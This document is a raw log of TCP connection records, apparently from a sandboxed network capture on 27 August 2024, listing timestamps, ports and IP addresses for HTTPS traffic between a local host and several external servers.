                                                                Aug 27, 2024 20:03:33.058161974 CEST49731443192.168.2.1645.164.92.188
                                                                Aug 27, 2024 20:03:33.090115070 CEST49732443192.168.2.1645.164.92.188
                                                                Aug 27, 2024 20:03:33.090127945 CEST4434973245.164.92.188192.168.2.16
                                                                Aug 27, 2024 20:03:33.138132095 CEST49732443192.168.2.1645.164.92.188
                                                                Aug 27, 2024 20:03:33.279171944 CEST44349733172.217.16.196192.168.2.16
                                                                Aug 27, 2024 20:03:33.279510975 CEST49733443192.168.2.16172.217.16.196
                                                                Aug 27, 2024 20:03:33.279525042 CEST44349733172.217.16.196192.168.2.16
                                                                Aug 27, 2024 20:03:33.280622959 CEST44349733172.217.16.196192.168.2.16
                                                                Aug 27, 2024 20:03:33.280698061 CEST49733443192.168.2.16172.217.16.196
                                                                Aug 27, 2024 20:03:33.281744957 CEST49733443192.168.2.16172.217.16.196
                                                                Aug 27, 2024 20:03:33.281794071 CEST44349733172.217.16.196192.168.2.16
                                                                Aug 27, 2024 20:03:33.329137087 CEST49733443192.168.2.16172.217.16.196
                                                                Aug 27, 2024 20:03:33.329144001 CEST44349733172.217.16.196192.168.2.16
                                                                Aug 27, 2024 20:03:33.378088951 CEST49733443192.168.2.16172.217.16.196
                                                                Aug 27, 2024 20:03:33.665369034 CEST4434973145.164.92.188192.168.2.16
                                                                Aug 27, 2024 20:03:33.665395021 CEST4434973145.164.92.188192.168.2.16
                                                                Aug 27, 2024 20:03:33.665467024 CEST49731443192.168.2.1645.164.92.188
                                                                Aug 27, 2024 20:03:33.665481091 CEST4434973145.164.92.188192.168.2.16
                                                                Aug 27, 2024 20:03:33.675314903 CEST4434973145.164.92.188192.168.2.16
                                                                Aug 27, 2024 20:03:33.675770044 CEST49731443192.168.2.1645.164.92.188
                                                                Aug 27, 2024 20:03:33.675842047 CEST49731443192.168.2.1645.164.92.188
                                                                Aug 27, 2024 20:03:33.675853014 CEST4434973145.164.92.188192.168.2.16
                                                                Aug 27, 2024 20:03:33.715085030 CEST49732443192.168.2.1645.164.92.188
                                                                Aug 27, 2024 20:03:33.760492086 CEST4434973245.164.92.188192.168.2.16
                                                                Aug 27, 2024 20:03:34.023224115 CEST4968080192.168.2.16192.229.211.108
                                                                Aug 27, 2024 20:03:34.118946075 CEST4434973245.164.92.188192.168.2.16
                                                                Aug 27, 2024 20:03:34.119021893 CEST4434973245.164.92.188192.168.2.16
                                                                Aug 27, 2024 20:03:34.119159937 CEST49732443192.168.2.1645.164.92.188
                                                                Aug 27, 2024 20:03:34.120867968 CEST49732443192.168.2.1645.164.92.188
                                                                Aug 27, 2024 20:03:34.120872974 CEST4434973245.164.92.188192.168.2.16
                                                                Aug 27, 2024 20:03:34.720298052 CEST49734443192.168.2.1645.164.92.188
                                                                Aug 27, 2024 20:03:34.720343113 CEST4434973445.164.92.188192.168.2.16
                                                                Aug 27, 2024 20:03:34.720411062 CEST49735443192.168.2.1645.164.92.188
                                                                Aug 27, 2024 20:03:34.720460892 CEST4434973545.164.92.188192.168.2.16
                                                                Aug 27, 2024 20:03:34.720478058 CEST49734443192.168.2.1645.164.92.188
                                                                Aug 27, 2024 20:03:34.720509052 CEST49735443192.168.2.1645.164.92.188
                                                                Aug 27, 2024 20:03:34.720884085 CEST49735443192.168.2.1645.164.92.188
                                                                Aug 27, 2024 20:03:34.720899105 CEST4434973545.164.92.188192.168.2.16
                                                                Aug 27, 2024 20:03:34.721021891 CEST49734443192.168.2.1645.164.92.188
                                                                Aug 27, 2024 20:03:34.721035004 CEST4434973445.164.92.188192.168.2.16
                                                                Aug 27, 2024 20:03:35.439317942 CEST4434973545.164.92.188192.168.2.16
                                                                Aug 27, 2024 20:03:35.439629078 CEST49735443192.168.2.1645.164.92.188
                                                                Aug 27, 2024 20:03:35.439641953 CEST4434973545.164.92.188192.168.2.16
                                                                Aug 27, 2024 20:03:35.440488100 CEST4434973545.164.92.188192.168.2.16
                                                                Aug 27, 2024 20:03:35.441031933 CEST49735443192.168.2.1645.164.92.188
                                                                Aug 27, 2024 20:03:35.441250086 CEST49735443192.168.2.1645.164.92.188
                                                                Aug 27, 2024 20:03:35.441255093 CEST4434973545.164.92.188192.168.2.16
                                                                Aug 27, 2024 20:03:35.441301107 CEST4434973545.164.92.188192.168.2.16
                                                                Aug 27, 2024 20:03:35.486172915 CEST49735443192.168.2.1645.164.92.188
                                                                Aug 27, 2024 20:03:35.543740034 CEST4434973445.164.92.188192.168.2.16
                                                                Aug 27, 2024 20:03:35.544133902 CEST49734443192.168.2.1645.164.92.188
                                                                Aug 27, 2024 20:03:35.544153929 CEST4434973445.164.92.188192.168.2.16
                                                                Aug 27, 2024 20:03:35.544514894 CEST4434973445.164.92.188192.168.2.16
                                                                Aug 27, 2024 20:03:35.544816017 CEST49734443192.168.2.1645.164.92.188
                                                                Aug 27, 2024 20:03:35.544888020 CEST4434973445.164.92.188192.168.2.16
                                                                Aug 27, 2024 20:03:35.598146915 CEST49734443192.168.2.1645.164.92.188
                                                                Aug 27, 2024 20:03:36.061470985 CEST4434973545.164.92.188192.168.2.16
                                                                Aug 27, 2024 20:03:36.077961922 CEST4434973545.164.92.188192.168.2.16
                                                                Aug 27, 2024 20:03:36.078063011 CEST49735443192.168.2.1645.164.92.188
                                                                Aug 27, 2024 20:03:36.078349113 CEST49735443192.168.2.1645.164.92.188
                                                                Aug 27, 2024 20:03:36.078368902 CEST4434973545.164.92.188192.168.2.16
                                                                Aug 27, 2024 20:03:36.101317883 CEST49736443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:36.101357937 CEST44349736172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:36.101428032 CEST49736443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:36.101651907 CEST49737443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:36.101691008 CEST44349737172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:36.101744890 CEST49737443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:36.101900101 CEST49736443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:36.101912975 CEST44349736172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:36.102050066 CEST49737443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:36.102061033 CEST44349737172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:36.586513996 CEST44349736172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:36.586865902 CEST49736443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:36.586899042 CEST44349736172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:36.588602066 CEST44349736172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:36.588680029 CEST49736443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:36.590435982 CEST49736443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:36.590630054 CEST44349736172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:36.590764999 CEST49736443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:36.590779066 CEST44349736172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:36.591523886 CEST44349737172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:36.591732025 CEST49737443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:36.591757059 CEST44349737172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:36.592878103 CEST44349737172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:36.592941046 CEST49737443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:36.593902111 CEST49737443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:36.593996048 CEST44349737172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:36.632129908 CEST49736443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:36.647139072 CEST49737443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:36.647166014 CEST44349737172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:36.694154978 CEST49737443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:36.793277979 CEST44349736172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:36.793411970 CEST44349736172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:36.793446064 CEST44349736172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:36.793477058 CEST49736443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:36.793487072 CEST44349736172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:36.793510914 CEST44349736172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:36.793529034 CEST49736443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:36.796030045 CEST44349736172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:36.796108007 CEST49736443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:36.796364069 CEST49736443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:36.796382904 CEST44349736172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:36.816071033 CEST49738443192.168.2.16104.17.24.14
                                                                Aug 27, 2024 20:03:36.816107035 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:36.816183090 CEST49738443192.168.2.16104.17.24.14
                                                                Aug 27, 2024 20:03:36.816509008 CEST49738443192.168.2.16104.17.24.14
                                                                Aug 27, 2024 20:03:36.816523075 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:36.822118044 CEST49739443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:36.822154999 CEST44349739104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:36.822238922 CEST49739443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:36.822446108 CEST49739443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:36.822457075 CEST44349739104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:37.286081076 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.287215948 CEST49738443192.168.2.16104.17.24.14
                                                                Aug 27, 2024 20:03:37.287242889 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.288279057 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.288352966 CEST49738443192.168.2.16104.17.24.14
                                                                Aug 27, 2024 20:03:37.289681911 CEST49738443192.168.2.16104.17.24.14
                                                                Aug 27, 2024 20:03:37.289928913 CEST49738443192.168.2.16104.17.24.14
                                                                Aug 27, 2024 20:03:37.289935112 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.290052891 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.295053005 CEST44349739104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:37.295301914 CEST49739443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:37.295325041 CEST44349739104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:37.296308994 CEST44349739104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:37.296382904 CEST49739443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:37.297416925 CEST49739443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:37.297491074 CEST44349739104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:37.297588110 CEST49739443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:37.297600031 CEST44349739104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:37.329869986 CEST49738443192.168.2.16104.17.24.14
                                                                Aug 27, 2024 20:03:37.329891920 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.345166922 CEST49739443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:37.377175093 CEST49738443192.168.2.16104.17.24.14
                                                                Aug 27, 2024 20:03:37.437143087 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.437201023 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.437241077 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.437282085 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.437308073 CEST49738443192.168.2.16104.17.24.14
                                                                Aug 27, 2024 20:03:37.437319040 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.437342882 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.437359095 CEST49738443192.168.2.16104.17.24.14
                                                                Aug 27, 2024 20:03:37.437419891 CEST49738443192.168.2.16104.17.24.14
                                                                Aug 27, 2024 20:03:37.438297987 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.438420057 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.438458920 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.438473940 CEST49738443192.168.2.16104.17.24.14
                                                                Aug 27, 2024 20:03:37.438481092 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.438525915 CEST49738443192.168.2.16104.17.24.14
                                                                Aug 27, 2024 20:03:37.438533068 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.440561056 CEST44349739104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:37.440619946 CEST44349739104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:37.440675020 CEST49739443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:37.441011906 CEST49739443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:37.441030979 CEST44349739104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:37.442748070 CEST49740443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:37.442814112 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:37.442903996 CEST49740443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:37.443249941 CEST49740443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:37.443270922 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:37.446732044 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.446818113 CEST49738443192.168.2.16104.17.24.14
                                                                Aug 27, 2024 20:03:37.446829081 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.488166094 CEST49738443192.168.2.16104.17.24.14
                                                                Aug 27, 2024 20:03:37.522486925 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.523753881 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.523833990 CEST49738443192.168.2.16104.17.24.14
                                                                Aug 27, 2024 20:03:37.523861885 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.524128914 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.524174929 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.524174929 CEST49738443192.168.2.16104.17.24.14
                                                                Aug 27, 2024 20:03:37.524188995 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.524239063 CEST49738443192.168.2.16104.17.24.14
                                                                Aug 27, 2024 20:03:37.524287939 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.524352074 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.524395943 CEST49738443192.168.2.16104.17.24.14
                                                                Aug 27, 2024 20:03:37.524403095 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.524935961 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.524971008 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.524991035 CEST49738443192.168.2.16104.17.24.14
                                                                Aug 27, 2024 20:03:37.525000095 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.525043964 CEST49738443192.168.2.16104.17.24.14
                                                                Aug 27, 2024 20:03:37.525266886 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.525614023 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.525645018 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.525666952 CEST49738443192.168.2.16104.17.24.14
                                                                Aug 27, 2024 20:03:37.525674105 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.525721073 CEST49738443192.168.2.16104.17.24.14
                                                                Aug 27, 2024 20:03:37.525919914 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.526354074 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.526391029 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.526416063 CEST49738443192.168.2.16104.17.24.14
                                                                Aug 27, 2024 20:03:37.526423931 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.526473045 CEST49738443192.168.2.16104.17.24.14
                                                                Aug 27, 2024 20:03:37.526480913 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.568162918 CEST49738443192.168.2.16104.17.24.14
                                                                Aug 27, 2024 20:03:37.568182945 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.612679958 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.612767935 CEST49738443192.168.2.16104.17.24.14
                                                                Aug 27, 2024 20:03:37.612803936 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.612821102 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.612881899 CEST49738443192.168.2.16104.17.24.14
                                                                Aug 27, 2024 20:03:37.613084078 CEST49738443192.168.2.16104.17.24.14
                                                                Aug 27, 2024 20:03:37.613101006 CEST44349738104.17.24.14192.168.2.16
                                                                Aug 27, 2024 20:03:37.908607006 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:37.909019947 CEST49740443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:37.909034014 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:37.909342051 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:37.909760952 CEST49740443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:37.909821987 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:37.910162926 CEST49740443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:37.952498913 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.038041115 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.038083076 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.038183928 CEST49740443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:38.038188934 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.038204908 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.038273096 CEST49740443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:38.038296938 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.038852930 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.038881063 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.038899899 CEST49740443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:38.038908005 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.038949966 CEST49740443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:38.039604902 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.039762020 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.039804935 CEST49740443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:38.039814949 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.049097061 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.049153090 CEST49740443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:38.049179077 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.095184088 CEST49740443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:38.125113010 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.125250101 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.125303030 CEST49740443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:38.125318050 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.125353098 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.125394106 CEST49740443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:38.125401020 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.126697063 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.126733065 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.126774073 CEST49740443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:38.126780987 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.126844883 CEST49740443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:38.127396107 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.127671003 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.127724886 CEST49740443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:38.127733946 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.128412962 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.128441095 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.128472090 CEST49740443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:38.128488064 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.128525019 CEST49740443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:38.129492044 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.130152941 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.130206108 CEST49740443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:38.130213976 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.130342960 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.130381107 CEST49740443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:38.130389929 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.131396055 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.131422043 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.131464005 CEST49740443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:38.131470919 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.131510973 CEST49740443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:38.131619930 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.131632090 CEST49740443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:38.131683111 CEST44349740104.18.95.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.131694078 CEST49740443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:38.131726027 CEST49740443192.168.2.16104.18.95.41
                                                                Aug 27, 2024 20:03:38.143125057 CEST49741443192.168.2.16104.18.94.41
                                                                Aug 27, 2024 20:03:38.143156052 CEST44349741104.18.94.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.143213987 CEST49741443192.168.2.16104.18.94.41
                                                                Aug 27, 2024 20:03:38.143532038 CEST49741443192.168.2.16104.18.94.41
                                                                Aug 27, 2024 20:03:38.143539906 CEST44349741104.18.94.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.259289026 CEST49737443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:38.304505110 CEST44349737172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:38.364660978 CEST49742443192.168.2.16104.21.51.138
                                                                Aug 27, 2024 20:03:38.364718914 CEST44349742104.21.51.138192.168.2.16
                                                                Aug 27, 2024 20:03:38.364851952 CEST49742443192.168.2.16104.21.51.138
                                                                Aug 27, 2024 20:03:38.365046978 CEST49742443192.168.2.16104.21.51.138
                                                                Aug 27, 2024 20:03:38.365062952 CEST44349742104.21.51.138192.168.2.16
                                                                Aug 27, 2024 20:03:38.418692112 CEST44349737172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:38.418768883 CEST44349737172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:38.418804884 CEST44349737172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:38.418837070 CEST44349737172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:38.418855906 CEST49737443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:38.418872118 CEST44349737172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:38.418883085 CEST44349737172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:38.418957949 CEST49737443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:38.418993950 CEST44349737172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:38.419023991 CEST49737443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:38.419044971 CEST49737443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:38.421806097 CEST49737443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:38.421839952 CEST44349737172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:38.440051079 CEST49743443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:38.440093994 CEST44349743172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:38.440211058 CEST49743443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:38.440464020 CEST49743443192.168.2.16172.66.47.111
                                                                Aug 27, 2024 20:03:38.440474987 CEST44349743172.66.47.111192.168.2.16
                                                                Aug 27, 2024 20:03:38.647583008 CEST44349741104.18.94.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.647955894 CEST49741443192.168.2.16104.18.94.41
                                                                Aug 27, 2024 20:03:38.647980928 CEST44349741104.18.94.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.648988008 CEST44349741104.18.94.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.649075985 CEST49741443192.168.2.16104.18.94.41
                                                                Aug 27, 2024 20:03:38.649405003 CEST49741443192.168.2.16104.18.94.41
                                                                Aug 27, 2024 20:03:38.649473906 CEST44349741104.18.94.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.649568081 CEST49741443192.168.2.16104.18.94.41
                                                                Aug 27, 2024 20:03:38.649580002 CEST44349741104.18.94.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.698174000 CEST49741443192.168.2.16104.18.94.41
                                                                Aug 27, 2024 20:03:38.792917013 CEST44349741104.18.94.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.792956114 CEST44349741104.18.94.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.793009043 CEST49741443192.168.2.16104.18.94.41
                                                                Aug 27, 2024 20:03:38.793024063 CEST44349741104.18.94.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.793186903 CEST44349741104.18.94.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.793210030 CEST44349741104.18.94.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.793258905 CEST49741443192.168.2.16104.18.94.41
                                                                Aug 27, 2024 20:03:38.793263912 CEST44349741104.18.94.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.793373108 CEST49741443192.168.2.16104.18.94.41
                                                                Aug 27, 2024 20:03:38.793787003 CEST44349741104.18.94.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.793838978 CEST44349741104.18.94.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.793895960 CEST49741443192.168.2.16104.18.94.41
                                                                Aug 27, 2024 20:03:38.793904066 CEST44349741104.18.94.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.794061899 CEST44349741104.18.94.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.794152021 CEST49741443192.168.2.16104.18.94.41
                                                                Aug 27, 2024 20:03:38.794157028 CEST44349741104.18.94.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.799943924 CEST44349741104.18.94.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.800004005 CEST49741443192.168.2.16104.18.94.41
                                                                Aug 27, 2024 20:03:38.800017118 CEST44349741104.18.94.41192.168.2.16
                                                                Aug 27, 2024 20:03:38.834726095 CEST44349742104.21.51.138192.168.2.16
                                                                Aug 27, 2024 20:03:38.835082054 CEST49742443192.168.2.16104.21.51.138
                                                                Aug 27, 2024 20:03:38.835102081 CEST44349742104.21.51.138192.168.2.16
                                                                Aug 27, 2024 20:03:38.836102009 CEST44349742104.21.51.138192.168.2.16
